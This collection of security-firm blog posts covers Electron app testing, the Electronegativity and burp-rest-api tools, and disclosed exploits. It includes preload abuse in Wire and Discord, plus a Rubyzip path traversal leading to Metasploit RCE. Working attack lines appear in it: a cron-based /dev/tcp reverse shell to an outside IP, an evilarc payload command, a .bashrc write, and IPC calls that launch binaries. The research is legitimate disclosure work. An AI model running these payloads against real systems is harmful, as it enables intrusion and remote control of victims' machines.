var _0 = ["SayHello", "GetCount", "Message : ", "You are welcome."];
function NewObject(contentsOfMyTextFile) {
  var _1 = 0;
  this[_0[0]] = function(theLibrary) {
    _1++;
    alert(contentsOfMyTextFile + theLibrary);
  };
  this[_0[1]] = function() {
    return _1;
  };
}
var obj = new NewObject(_0[2]);
obj.SayHello(_0[3]);

Enabling the developer tools in the renderer process

During testing, it is particularly important to review all web resources as we would normally do in a standard web application assessment. For this reason, it is highly recommended to enable the Developer Tools in all renderers and <webview> tags.

Electron’s Main process can use the BrowserWindow API to call the BrowserWindow method and instantiate a new renderer.

In the example below, we are creating a new BrowserWindow instance with specific attributes. Additionally, we can insert a new statement to launch the Developer tools:

/app/mainScreen.js

var winOptions = {
    title: 'Example App',
    backgroundColor: '#ffffff',
    width: DEFAULT_WIDTH,
    height: DEFAULT_HEIGHT,
    minWidth: MIN_WIDTH,
    minHeight: MIN_HEIGHT,
    transparent: false,
    frame: false,
    resizable: true,
    show: isVisible,
    webPreferences: {
      nodeIntegration: false,
      preload: _path2.default.join(__dirname, 'preload.js')
    }
  };

[ -- cut -- ]

mainWindow = new _electron.BrowserWindow(winOptions);
  winId = win.id;

//|--> HERE we can hook and add the Developers Tools <--|
win.webContents.openDevTools({ mode: 'bottom' })
win.setMenuBarVisibility(true);

If everything worked fine, we should have the Developers Tools enabled for the main UI screen.

From the main Developer Tool console, we can open additional developer tools windows for other renderers (e.g. webview tags).

window.document.getElementsByTagName("webview")[0].openDevTools()

While reading the code above, have you noticed the webPreference options?

WebPreferences options are basically settings for the renderer process and include things like window size, appearance, colors, security features, etc. Some of these settings are pretty useful for debugging purposes too.

For example, we can make all windows visible by using the show property of WebPreferences:

BrowserWindow({show: true})

Adding debugging statements

During instrumentation, it is useful to include debugging code such as

console.log("\n--------------- Debug --------------------\n")
console.log(process.type)
console.log(process.pid)
console.log(process.argv)
console.log("\n--------------- Debug --------------------\n")

Debugging the main process

Since it is not possible to open the developer tools for the Main Process, debugging this component is a bit trickier. Luckily, Chromium’s Developer Tools can be used to debug Electron’s main process with just a minor adjustment.

The DevTools in an Electron browser window can only debug JavaScript executed in that window (i.e. the web page). To debug JavaScript executed in the main process you will need to leverage the native debugger and launch Electron with the --inspect or --inspect-brk switch.

Use one of the following command line switches to enable debugging of the main process:

–inspect=[port] Electron will listen for V8 inspector protocol messages on the specified port, an external debugger will need to connect on this port. The default port is 5858.

–inspect-brk=[port] Like –inspect but pauses execution on the first line of JavaScript.

Usage: electron --inspect=5858 your-app

You can now connect Chrome by visiting chrome://inspect and analyze the launched Electron app present there.

Intercepting HTTP(s) traffic

Chromium supports system proxy settings on all platforms, so setup a proxy and then add Burp CA as usual.

We can even use the following command line argument if you run the Electron application directly. Please note that this does not work when using the bundled app.

--proxy-server=address:port

Or, programmatically with these lines in the main app:

const {app} = require('electron') 
app.commandLine.appendSwitch('proxy-server', '127.0.0.1:8080')

For Node, use transparent proxying by either changing /etc/hosts or overriding configs:

npm config set proxy http://localhost:8080
npm config set https-proxy http://localhost:8081

In case you need to revert the proxy settings, use:

npm config rm proxy
npm config rm https-proxy

However, you need to disable TLS validation with the following code within the application under testing:

process.env.NODE_TLS_REJECT_UNAUTHORIZED = “0";

Outro

Proper instrumentation is a fundamental step in performing a comprehensive security test. Combining source code review with dynamic testing and client instrumentation, it is possible to analyze every aspect of the target application. These simple techniques allow us to reach edge cases, exercise all code paths and eventually find vulnerabilities.

@voidsec @lucacarettoni

Read more

Introducing burp-rest-api v2

Since the first commit back in 2016, burp-rest-api has been the default tool for BurpSuite-powered web scanning automation. Many security professionals and organizations have relied on this extension to orchestrate the work of Burp Spider and Scanner.

Today, we’re proud to announce a new major release of the tool: burp-rest-api v2.0.1

Starting in June 2018, Doyensec joined VMware in the development and support of the growing burp-rest-api community. After several years of experience in big tech companies and startups, we understand the need for security automation to improve efficacy and efficiency during software security activities. Unfortunately internal security tools are rarely open-sourced, and still, too many companies are reinventing the wheel. We believe that working together on foundational components, such as burp-rest-api, represents the future of security automation as it empowers companies of any size to build customized solutions.

After a few weeks of work, we cleaned up all the open issues and brought burp-rest-api to its next phase. In this blog post, we would like to summarize some of the improvements.

Releases

You can now download the latest version of burp-rest-api from https://github.com/vmware/burp-rest-api/releases in a precompiled release build. While this may not sound like a big deal, it’s actually the result of a major change in the plugin bootstrap mechanism. Until now, burp-rest-api was strictly dependent on the original Burp Suite JAR to be compiled, hence we weren’t able to create stable releases due to licensing. By re-engineering the way burp-rest-api starts, it is now possible to build the extension without even having burpsuite_pro.jar.

git clone [email protected]:vmware/burp-rest-api.git
cd burp-rest-api
./gradlew clean build

Once built, you can now execute Burp with the burp-rest-api extension using the following command:

java -jar burp-rest-api-2.0.0.jar --burp.jar=./lib/burpsuite_pro.jar

Burp Extensions and BAppStore

Many users have asked for the ability to load additional extensions while running Burp with burp-rest-api. Thanks to a new bootstrap mechanism, burp-rest-api is loaded as a 2nd generation extension which makes it possible to load both custom and BAppStore extensions written in any of the supported programming languages.

Moreover, the tool allows loading extensions during application startup using the flag --burp.ext=<filename.{jar,rb,py}>.

In order to implement this, we employed a classloading technique with a dummy entry point (BurpExtender.java) that loads the legacy Burp extension (LegacyBurpExtension.java) after the full Burp Suite has been loaded and launched (BurpService.java).

Bug Fixes and Improvements

In this release, we have also focused our efforts on a massive issues house-cleaning:

  • Better documentation and even a FAQs page
  • Burp Spider status API
  • Burp Configuration with configPath selection API
  • Enabled SpringBoot compression
  • Ability to customize the binding address:port for both Burp Proxy and burp-rest-api APIs via command line arguments
  • …and much more

Help Us Shape The Future of burp-rest-api

With the release of Burp Suite Professional 2.0 (beta), Burp includes a native Rest API.

While the current functionalities are very limited, this is certainly going to change.

In the initial release, the REST API supports launching vulnerability scans and obtaining the results. Over time, additional functions will be added to the REST API.

It’s great that Burp users will finally benefit from a native Rest API, however this new feature makes us wonder about the future for this project.

Let us know how burp-rest-api can still provide value, and which directions the project could take. Comment on this Github Issue or tweet to our @Doyensec account.

Thank you for the support,

Luca Carettoni & Andrea Brancaleoni

Electronegativity is finally out!

We’re excited to announce the public release of Electronegativity, an opensource tool capable of identifying misconfigurations and security anti-patterns in Electron-based applications.

Electronegativity is the first-of-its-kind tool that can help software developers and security auditors to detect and mitigate potential weaknesses in Electron applications.

If you’re simply interested in trying out Electronegativity, go ahead and install it using NPM:

$ npm install @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

Results are displayed in a compact table, with references to application files and our knowledge-base.

Electronegativity Demo

The remaining blog post will provide more details on the public release and introduce its current features.

A bit of history

Back in July 2017 at the BlackHat USA Briefings, we presented the first comprehensive study on Electron security where we primarily focused on framework-level vulnerabilities and misconfigurations. As part of our research journey, we also created a checklist of security anti-patterns and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications.

With that, me and Claudio Merloni started developing the first prototype for Electronegativity. Immediately after the BlackHat presentation, we received a lot of great feedback and new ideas on how to evolve the tool. Back home, we started working on those improvements until we realized that we had to rethink the overall design. The code repository was made private again and minor refinements were done in between customer projects only.

In the summer of 2018, we hired Doyensec’s first intern - Ibram Marzouk who started working on the tool again. Later, Jaroslav Lobacevski joined the project team and pushed Electronegativity to the finish line. Claudio, Ibram and Jaroslav, thanks for your contributions!

While certainly overdue, we’re happy that we eventually managed to release the tool in better shape. We believe that Electron is here to stay and hopefully Electronegativity will become a useful companion for all Electron developers out there.

How Does It Work?

Electronegativity leverages AST / DOM parsing to look for security-relevant configurations. Checks are standalone files, which makes the tool modular and extensible.

Building a new check is relatively easy too. We support three “families” of checks, so that the tool can analyze all resources within an Electron application:

When you scan an application, the tool will unpack all resources (if applicable) and perform an audit using all registered checks. Results are displayed in the terminal, CSV file or SARIF format.

Supported Checks

Electronegativity currently implements the following checks. A knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities:

  1. ALLOWPOPUPS_HTML_CHECK
  2. AUXCLICK_JS_CHECK
  3. AUXCLICK_HTML_CHECK
  4. BLINK_FEATURES_JS_CHECK
  5. BLINK_FEATURES_HTML_CHECK
  6. CERTIFICATE_ERROR_EVENT_JS_CHECK
  7. CERTIFICATE_VERIFY_PROC_JS_CHECK
  8. CONTEXT_ISOLATION_JS_CHECK
  9. CUSTOM_ARGUMENTS_JS_CHECK
  10. DANGEROUS_FUNCTIONS_JS_CHECK
  11. ELECTRON_VERSION_JSON_CHECK
  12. EXPERIMENTAL_FEATURES_HTML_CHECK
  13. EXPERIMENTAL_FEATURES_JS_CHECK
  14. HTTP_RESOURCES_JS_CHECK
  15. HTTP_RESOURCES_HTML_CHECK
  16. INSECURE_CONTENT_HTML_CHECK
  17. INSECURE_CONTENT_JS_CHECK
  18. NODE_INTEGRATION_HTML_CHECK
  19. NODE_INTEGRATION_EVENT_JS_CHECK
  20. NODE_INTEGRATION_JS_CHECK
  21. OPEN_EXTERNAL_JS_CHECK
  22. PERMISSION_REQUEST_HANDLER_JS_CHECK
  23. PRELOAD_JS_CHECK
  24. PROTOCOL_HANDLER_JS_CHECK
  25. SANDBOX_JS_CHECK
  26. WEB_SECURITY_HTML_CHECK
  27. WEB_SECURITY_JS_CHECK

Leveraging these 27 checks, Electronegativity is already capable of identifying many vulnerabilities in real-life applications. Going forward, we will keep improving the detection and updating the tool to keep pace with the fast-changing Electron framework. Start using Electronegativity today!

Subverting Electron Apps via Insecure Preload

We’re back from BlackHat Asia 2019 where we introduced a relatively unexplored class of vulnerabilities affecting Electron-based applications.

Despite popular belief, secure-by-default settings are slowly becoming the norm and the dev community is gradually learning common pitfalls. Isolation is now widely deployed across all top Electron applications and so turning XSS into RCE isn’t child’s play anymore.

From Alert to Calc

BrowserWindow preload introduces a new and interesting attack vector. Even without a framework bug (e.g. nodeIntegration bypass), this neglected attack surface can be abused to bypass isolation and access Node.js primitives in a reliable manner.

You can download the slides of our talk from the official BlackHat Briefings archive: http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Carettoni-Preloading-Insecurity-In-Your-Electron.pdf

Preloading Insecurity In Your Electron

Preload is a mechanism to execute code before renderer scripts are loaded. This is generally employed by applications to export functions and objects to the page’s window object as shown in the official documentation:

let win
app.on('ready', () => {
  win = new BrowserWindow({
    webPreferences: {
      sandbox: true,
      preload: 'preload.js'
    }
  })
  win.loadURL('http://google.com')
})

preload.js can contain custom logic to augment the renderer with easy-to-use functions or application-specific objects:

const fs = require('fs')
const { ipcRenderer } = require('electron')

// read a configuration file using the `fs` module
const buf = fs.readFileSync('allowed-popup-urls.json')
const allowedUrls = JSON.parse(buf.toString('utf8'))

const defaultWindowOpen = window.open

function customWindowOpen (url, ...args) {
  if (allowedUrls.indexOf(url) === -1) {
    ipcRenderer.sendSync('blocked-popup-notification', location.origin, url)
    return null
  }
  return defaultWindowOpen(url, ...args)
}

window.open = customWindowOpen

[...]

Through performing numerous assessments on behalf of our clients, we noticed a general lack of awareness around the risks introduced by preload scripts. Even in popular applications using all recommended security best practices, we were able to turn boring XSS into RCE in a matter of hours.

This prompted us to further research the topic and categorize four types of insecure preloads:

  • (1) Preload scripts can reintroduce Node global symbols back to the global scope

    While it is evident that reintroducing some Node global symbols (e.g. process) to the renderer is dangerous, the risk is not immediately obvious for classes like Buffer (which can be leveraged for a nodeIntegration bypass)

  • (2) Preload scripts can introduce functionalities that can be abused by untrusted code

    Preload scripts have access to Node.js, and the functions exported by applications to the global window often include dangerous primitives

  • (3) Preload scripts can facilitate sandbox bypasses

    Even with sandbox enabled, preload scripts still have access to Node.JS native classes and a few Electron modules. Once again, preload code can leak privileged APIs to untrusted code that could facilitate sandbox bypasses

  • (4) Without contextIsolation, the integrity of preload scripts is not guaranteed

    When isolated words are not in use, prototype pollution attacks can override preload script code. Malicious JavaScript running in the renderer can alter preload functions in order to return different data, bypass checks, etc.

In this blog post, we will analyze a couple of vulnerabilities belonging to group (2) which we discovered in two popular applications: Wire App and Discord.

For more vulnerabilities and examples, please refer to our presentation.

WireApp Desktop Arbitrary File Write via Insecure Preload

Wire App is a self-proclaimed “most secure collaboration platform”. It’s a secure messaging app using end-to-end encryption for file sharing, voice, and video calls. The application implements isolation by using a BrowserWindow with nodeIntegration disabled, in which a webview HTML tag is used.

Wire App frames

Despite enforcing isolation, the web-view-preload.js preload file contains the following code:

const webViewLogger = new winston.Logger();
    webViewLogger.add(winston.transports.File, {
      filename: logFilePath,
      handleExceptions: true,
    });

    webViewLogger.info(config.NAME, 'Version', config.VERSION);

    // webapp uses global winston reference to define log level
    global.winston = webViewLogger;

Code running in the isolated renderer (e.g. XSS) can override the logger’s transport setting in order to obtain a file write primitive.

This issue can be easily verified by switching to the messages view:

window.document.getElementsByTagName("webview")[0].openDevTools();

Before executing the following code:

function formatme(args) {
  var logMessage = args.message;
  return logMessage;
}

winston.transports.file = (new winston.transports.file.__proto__.constructor({
        dirname: '/home/ikki/',
        level: 'error',
        filename: '.bashrc',
        json: false,
        formatter: formatme
}))

winston.error('xcalc &');


This issue affected all supported platforms (Windows, Mac, Linux). As the sandbox entitlement is enabled on macOS, an attacker would need to chain this issue with another bug to write outside the application folders. Please note that since it is possible to override some application files, RCE may still be possible without a macOS sandbox bypass.

A security patch was released on March 14, 2019, just few days after our disclosure.

Discord Desktop Arbitrary IPC via Insecure Preload

Discord is a popular voice and text chat used by over 250 million gamers. The application implements isolation by simply using a BrowserWindow with nodeIntegration disabled. Despite that, the preload script (app/mainScreenPreload.js) in use by the same BrowserWindow contains multiple exports including the following:

var DiscordNative = {
    isRenderer: process.type === 'renderer',
    //..
    ipc: require('./discord_native/ipc'),
};

//..

process.once('loaded', function () {
    global.DiscordNative = DiscordNative;
    //..
}

where app/discord_native/ipc.js contains the following code:

var electron = require('electron');
var ipcRenderer = electron.ipcRenderer;

function send(event) {
  for (var _len = arguments.length, args = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {
    args[_key - 1] = arguments[_key];
  }

  ipcRenderer.send.apply(ipcRenderer, [event].concat(args));
}

function on(event, callback) {
  ipcRenderer.on(event, callback);
}

module.exports = {
  send: send,
  on: on
};

Without going into details, this script is basically a wrapper for the official Electron’s asynchronous IPC mechanism in order to exchange messages from the render process (web page) to the main process.

In Electron, ipcMain and ipcRenderer modules are used to implement IPC between the main process and the renderers but they’re also leveraged for internal native framework invocations. For instance, the window.close() function is implemented using the following event listener:

// Implements window.close()
ipcMainInternal.on('ELECTRON_BROWSER_WINDOW_CLOSE', function (event) {
  const window = event.sender.getOwnerBrowserWindow()
  if (window) {
    window.close()
  }
  event.returnValue = null
})

As there’s no separation between application-level IPC messages and the ELECTRON_ internal channel, the ability to set arbitrary channel names allows untrusted code in the renderer to subvert the framework’s security mechanism.

For example, the following synchronous IPC calls can be used to execute an arbitrary binary:

(function () {
    var ipcRenderer = require('electron').ipcRenderer
    var electron = ipcRenderer.sendSync("ELECTRON_BROWSER_REQUIRE","electron");
    var shell = ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_GET", electron.id, "shell");
    return ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_CALL", shell.id, "openExternal", [{
                            type: 'value',
                            value: "file:///Applications/Calculator.app"
    }]);
})();

In the case of the Discord’s preload, an attacker can issue asynchronous IPC messages with arbitrary channels. While it is not possible to obtain a reference of the objects from the function exposed in the untrusted window, an attacker can still brute-force the reference of the child_process using the following code:

DiscordNative.ipc.send("ELECTRON_BROWSER_REQUIRE","child_process");

for(var i=0;i<50;i++){
    DiscordNative.ipc.send("ELECTRON_BROWSER_MEMBER_CALL", i, "exec", [{
            type: 'value',
            value: "calc.exe"
    }]);
}


This issue affected all supported platforms (Windows, Mac, Linux). A security patch was released at the beginning of 2019. Additionally, Discord also removed backwards compatibility code with old clients.

On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)

During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the Rubyzip gem. Zip files have always been an interesting entry-point to triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation.

This blog post discusses our results, the “bug” discovered in the library itself and the implication of such an issue in a popular piece of software - Metasploit.


Rubyzip and old vulnerabilities

The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376 where a different handling was implemented by the developers.

# Extracts entry to file dest_path (defaults to @name).
# NB: The caller is responsible for making sure dest_path is safe, 
# if it is passed.
def extract(dest_path = nil, &block)
    if dest_path.nil? && !name_safe?
        puts "WARNING: skipped #{@name} as unsafe"
        return self
    end

[...]

Entry#name_safe is defined a few lines before as:

# Is the name a relative path, free of `..` patterns that could lead to
# path traversal attacks? This does NOT handle symlinks; if the path
# contains symlinks, this check is NOT enough to guarantee safety.
def name_safe?
    cleanpath = Pathname.new(@name).cleanpath
    return false unless cleanpath.relative?
    root = ::File::SEPARATOR
    naive_expanded_path = ::File.join(root, cleanpath.to_s)
    cleanpath.expand_path(root).to_s == naive_expanded_path
end

In the code above, if the destination path is passed to the Entry#extract function then it is not actually checked. A comment in the source code of that function highlights the user’s responsibility:

# NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While the Entry#name_safe is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments.

In order to verify the library bug we generated a ZIP PoC using the old (and still good) evilarc, and extracted the malicious file using the following code:

require 'zip'

first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end
$ ls /tmp/file.txt
ls: cannot access '/tmp/file.txt': No such file or directory
$ zipinfo absolutepath.zip 
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-13 20:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-13 20:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
$ ruby Rubyzip-poc.rb absolutepath.zip 
Extracting /tmp/
Extracting /tmp/file.txt
$ ls /tmp/file.txt
/tmp/file.txt

Resulting in a file being created in /tmp/file.txt, which confirms the issue.

As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use without actually verifying how the library works or its specific usage in the codebase.

It would have been vulnerable anyway ¯\_(ツ)_/¯

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:

def unzip(input)
    uuid = get_uuid()
    # 0. create a 'Pathname' object with the new uuid
    parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")

    Zip::File.open(input[:zip_file].to_io) do |zip_file|
        zip_file.each_with_index do |entry, index|
            # 1. check the file is not present
            next if File.file?(parent_directory + entry.name)
            # 2. extract the entry
            entry.extract(parent_directory + entry.name)
        end
    end
    Success
end

In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the sum operator between objects and strings does not work as many developers would expect and might result in unintended behavior.

We can easily understand its behavior in an IRB shell:

$ irb
irb(main):001:0> require 'pathname'              
=> true
irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
=> #<Pathname:/tmp/random_uuid/>
irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
=> #<Pathname:/path>
irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
=> #<Pathname:/path/traversal>
irb(main):005:0> parent_directory + "../../path/traversal"
=> #<Pathname:/path/traversal>

Thanks to the interpretation of the ../ by Pathname, the argument to Rubyzip’s Entry#extract call does not contain any path traversal payloads which results in a mistakenly supposed “safe” path. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation.

From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix and windows specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application.

Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn’t find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot.

However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability.

The official documentation explains that:

After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious .rb in the /config/initializers folder which will be loaded at web server (re)boot.

Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework

Going through the source code, we were able to quickly identify several files that are using the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in zip.rb file (line 157) that is responsible for importing a Metasploit ZIP File:

 data.entries.each do |e|
      target = ::File.join(@import_filedata[:zip_tmp], e.name)
      data.extract(e,target)

As for the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps:

  1. Create a file with the following content:
    * * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  2. Generate the ZIP archive with the path traversal payload:
    python evilarc.py exploit --os unix -p etc/cron.d/
  3. Add a valid MSF workspace to the ZIP file (in order to have MSF to extract it, otherwise it will refuse to process the ZIP archive)
  4. Setup two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell)
  5. Login in the MSF Web Interface
  6. Create a new “Project”
  7. Select “Import”, “From file”, chose the evil ZIP file and finally click the “Import” button
  8. Wait for the import process to finish
  9. Enjoy your reverse shell


Conclusions

In case you are using Rubyzip, check the library usage and perform additional validation against the entry name and the destination path before calling Entry#extract.

Here is a small recap of the different scenarios (as of Rubyzip v1.2.2):

Usage Input by user? Vulnerable to path traversal?
entry.extract(path) yes (path) yes
entry.extract(path) partially (path is concatenated) maybe
entry.extract() partially (entry name) no
entry.extract() no no

If you’re using Metasploit, it is time to patch. We look forward to seeing a msf module for CVE-2019-5624.

Credits and References

Credit for the research and bugs go to @voidsec and @polict.

This work has been performed during a customer engagement and Doyensec 25% Research Time. As such, we would like to thank our customer and Metasploit maintainers for their support.

If you’re interested in the topic, take a look at the following resources:

Electronegativity 1.3.0 released!

After the first public release of Electronegativity, we had a great response from the community and the tool quickly became the baseline for every Electron app’s security review for many professionals and organizations. This pushed us forward, improving Electronegativity and expanding our research in the field. Today we are proud to release version 1.3.0 with many new improvements and security checks for your Electron applications.


We’re also excited to announce that the tool has been accepted for Black Hat USA Arsenal 2019, where it will be showcased at the Mandalay Bay in Las Vegas. We’ll be at Arsenal Station 1 on August 7, from 4:00 pm to 5:20 pm. Drop by to see live demonstrations of Electronegativity hunting real Electron applications for vulnerabilities (or just to say hi and collect Doyensec socks)!

If you’re simply interested in trying out what’s new in Electronegativity, go ahead and update or install it using NPM:

$ npm install @doyensec/electronegativity -g
# or
$ npm update @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

What’s New

Electronegativity 1.1.1 initially shipped with 27 unique checks. Now it counts over 40 checks, featuring a new advanced check system to help improve the tool’s detection capabilities in sorting out false positive and false negative findings. Here is a brief list of what’s new in this 1.3.0 release:

  • Now every check has an importance and accuracy attribute which helps the auditor to determine the importance of each finding. Consequently, we also introduced some new command line flags to filter the results by severity (--severity) and by confidence (--confidence), useful for tailored Electronegativity integration in your application security pipelines or build systems.
  • We introduced a new class of checks called GlobalChecks which can dynamically set the severity and confidence for the findings or create new ones considering the inherit security risk posed by their interaction (e.g. cross-checking the nodeIntegration and sandbox flags value or the presence of the affinity flag used acrossed different windows).
  • Variable scoping analysis capabilities have been added to inspect the Function and Global variable content, when available.
  • A new single-check scan mode is now provided by passing the -l flag along with a list of enabled checks (e.g. -l "AuxClickJsCheck,AuxClickHtmlCheck"). Another command line flag has been introduced to show relative paths for files (-r).
  • The newly introduced Electron’s component BrowserView is now supported, which is meant to be an alternative to the WebView tag. The tool now also detects the use of the nodeIntegrationInSubFrames experimental option for enabling NodeJS support in sub-frames (e.g. an iframe inside a webview object).
  • Various bug fixes and new checks! (see below)

Updated Checks

This new release also comes with new and updated checks. As always, a knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities.

Affinity Check

When specified, renderers with the same affinity will run in the same renderer process. Due to reusing the renderer process, certain webPreferences options will also be shared between the web pages even when you specified different values for them. This can lead to unexpected security configuration overrides:

Affinity Property Vulnerability

In the above demo, the affinity set between the two BrowserWindow objects will cause the unwanted share of the nodeIntegration property value. Electronegativity will now issue a finding reporting the usage of this flag if present.

Read more on the dedicated AFFINITY_GLOBAL_CHECK wiki page.

AllowPopups Check

When the allowpopups attribute is present, the guest page will be allowed to open new windows. Popups are disabled by default.

Read more on the ALLOWPOPUPS_HTML_CHECK wiki page.

Missing Electron Security Patches Detection

This check detects if there are security patches available for the Electron version used by the target application. From this release we switched from manually updating a safe releases file to creating a routine which automatically fetches the latest releases from Electron’s official repository and determines if there are security patches available at each run.

Read more on the AVAILABLE_SECURITY_FIXES_GLOBAL_CHECK and ELECTRON_VERSION_JSON_CHECK wiki page.

Check for Custom Command Line Arguments

This check will compare the custom command line arguments set in the package.json scripts and configuration objects against a blacklist of dangerous arguments. The use of additional command line arguments can increase the application attack surface, disable security features or influence the overall security posture.

Read more on the CUSTOM_ARGUMENTS_JSON_CHECK wiki page.

CSP Presence Check and Review

Electronegativity now checks if a Content Security Policy (CSP) is set as an additional layer of protection against cross-site-scripting attacks and data injection attacks. If a CSP is detected, it will look for weak directives by using a new library based on the csp-evaluator.withgoogle.com online tool.

Read more on the CSP_GLOBAL_CHECK wiki page.

Dangerous JS Functions called with user-supplied data

Looks for occurrences of insertCSS, executeJavaScript, eval, Function, setTimeout, setInterval and setImmediate with user-supplied input.

Read more on the DANGEROUS_FUNCTIONS_JS_CHECK wiki page.

Check for mitigations set to limit the navigation flows

Detects if the on() handler for will-navigate and new-window events is used. This setting can be used to limit the exploitability of certain issues. Not enforcing navigation limits leaves the Electron application under full control to remote origins in case of accidental navigation.

Read more on the LIMIT_NAVIGATION_GLOBAL_CHECK and LIMIT_NAVIGATION_JS_CHECK wiki pages.

Detects if Electron’s security warnings have been disabled

The tool will check if Electron’s warnings and recommendations printed to the developer console have been force-disabled by the developer. Disabling this warning may hide the presence of misconfigurations or insecure patterns to the developers.

Read more on the SECURITY_WARNINGS_DISABLED_JS_CHECK and SECURITY_WARNINGS_DISABLED_JSON_CHECK wiki pages.

Detects if setPermissionRequestHandler is missing for untrusted origins

Not enforcing custom checks for permission requests (e.g. media) leaves the Electron application under full control of the remote origin. For instance, a Cross-Site Scripting vulnerability can be used to access the browser media system and silently record audio/video. Because of this, Electronegativity will also check if a setPermissionRequestHandler has been set.

Read more on the PERMISSION_REQUEST_HANDLER_GLOBAL_CHECK wiki page.

…and more to come! If you are a developer, we encourage you to use Electronegativity to understand how these Electron’s security pitfalls affect your application and how to avoid them. We really believe that Electron deserves a strong security community behind and that creating the right and robust tools to help this community is the first step towards improving the whole Electron’s ecosystem security stance.

As a final remark, we’d like to thank all past and present contributors to this tool: @ikkisoft, @p4p3r, @0xibram, @yarlob, @lorenzostella, and ultimately @Doyensec for sponsoring this release.

See you in Vegas!

@lorenzostella

Electron Security Workshop

2-Days Training on How to Build Secure Electron Applications

We are excited to present our brand-new class on Electron Security! This blog post provides a general overview of the 2-days workshop.

ElectronJS Logo

With the increasing popularity of the ElectronJs Framework, we decided to create a class that teaches students how to build and maintain secure desktop applications that are resilient to attacks and common classes of vulnerabilities. Building secure Electron applications is possible, but complicated. You need to know the framework, follow its evolution, and constantly update and devise in depth defense mechanisms to mitigate its deficiencies.

Our training begins with an overview of Electron internals and the life cycle of a typical Electron-based application. After a quick intro, we will jump straight into threat modeling and attack surface. We will analyze what are the common root causes for misconfigurations and vulnerabilities. The class will be centered around two main topics: subverting the framework and breaking the custom application code. We will present security misconfigurations, security anti-patterns, nodeIntegration and sandbox bypasses, insecure preload bugs, prototype pollution attacks, affinity abuses and much more.

The class is hands-on with many live examples. The exercises and scenarios will help students understand how to identify vulnerabilities and build mitigations. Throughout the class, we will also have a few Q&A panels to answer all questions attendees might have and potentially review their code.

If you’re interested, check out this short teaser:

Audience Profile

Who should take this course?

  • JavaScript and Node.js Developers
  • Security Engineers
  • Security Auditors and Pentesters

We will provide details on how to find and fix security vulnerabilities, which makes this class suitable for both blue and red teams. Basic JavaScript development experience and basic understanding of web application security (e.g. XSS) is required.

General Information

Attendees will receive a bundle with all material, including:

  • Workshop presentation (over 200 slides)
  • Code, exploits and artifacts of all exercises
  • Certificate of completion

This 2-days training is delivered in English, either remotely or on-site (worldwide).

Doyensec will accept up to 15 attendees per tutor. If the number of attendees exceeds the maximum allowed, Doyensec will allocate additional tutors.

We’re a flexible security boutique and can further customize the agenda to your specific company’s needs.

Feel free to contact us at [email protected] for scheduling your class!

Jackson gadgets - Anatomy of a vulnerability

Jackson CVE-2019-12384: anatomy of a vulnerability class

During one of our engagements, we analyzed an application which used the Jackson library for deserializing JSONs. In that context, we have identified a deserialization vulnerability where we could control the class to be deserialized. In this article, we want to show how an attacker may leverage this deserialization vulnerability to trigger attacks such as Server-Side Request Forgery (SSRF) and remote code execution.

This research also resulted in a new CVE-2019-12384 and a bunch of RedHat products affected by it:

Vulnerability Impact

What is required?

